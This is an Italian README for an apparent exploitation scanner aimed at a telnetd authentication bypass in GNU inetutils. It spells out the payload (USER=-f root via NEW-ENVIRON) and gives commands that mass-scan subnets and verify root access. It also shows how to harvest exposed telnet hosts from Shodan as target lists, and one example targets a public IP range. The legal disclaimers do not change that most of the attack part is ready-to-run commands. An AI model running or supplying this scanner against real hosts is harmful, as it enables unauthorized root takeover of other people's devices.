
Scansiona per CVE-2026-24061 bypass di autenticazione telnetd, generando payload e verificando l'accesso root su dispositivi GNU inetutils telnetd vulnerabili.
⚠️ AVVISO LEGALE MOLTO IMPORTANTE ⚠️
Questo strumento è esclusivamente per scopi educativi, ricerca sulla sicurezza, analisi delle vulnerabilità e test autorizzati.
USER=-f root (o varianti) tramite l'opzione NEW-ENVIRON consente il login immediato come root senza password.Questo scanner è stato possibile grazie all'eccellente analisi tecnica e alla prova di concetto pubblicata dal team di Hakai Security.
Il loro articolo dettagliato ha fornito le basi tecniche precise sul vettore di sfruttamento, i payload reali e il comportamento del telnetd vulnerabile.
→ Leggi l'analisi completa qui:
https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/
Grazie mille a Hakai Security per la trasparenza, la qualità tecnica e il contributo alla community della sicurezza. Avete contribuito a rendere questo strumento più preciso e utile per la ricerca responsabile.
--users (default include root, admin, pi, ubuntu, debian, ecc.)id e whoami (--verify)-w)# Consigliato: usa virtualenv
python3 -m venv venv-cve
source venv-cve/bin/activate
# Installa le dipendenze
pip install telnetlib3 colorama
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50
# Con elenco di target (es: Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json
# Focalizzato su root (più veloce)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5
# Dry-run (elenca solo gli IP)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run
pip install shodan
# Inizializza con la tua API Key
shodan init SUA_API_KEY_AQUI
# Scarica possibili target
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'
# Estrai gli IP
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt
# Scan
python3 scan-cve-2026-24061.py alvos.txt --verify --banner
Le pull request sono benvenute, purché mantengano il focus etico e rafforzino gli avvisi di responsabilità. Licenza MIT License – ma ribadisco: l'uso non autorizzato è di esclusiva responsabilità dell'utente. Realizzato per studio, sensibilizzazione e ricerca sulla sicurezza.
⭐ Se lo trovi utile, lascia una stella!
🛡️ Usalo con estrema responsabilità.
Made with ❤️ by killsystema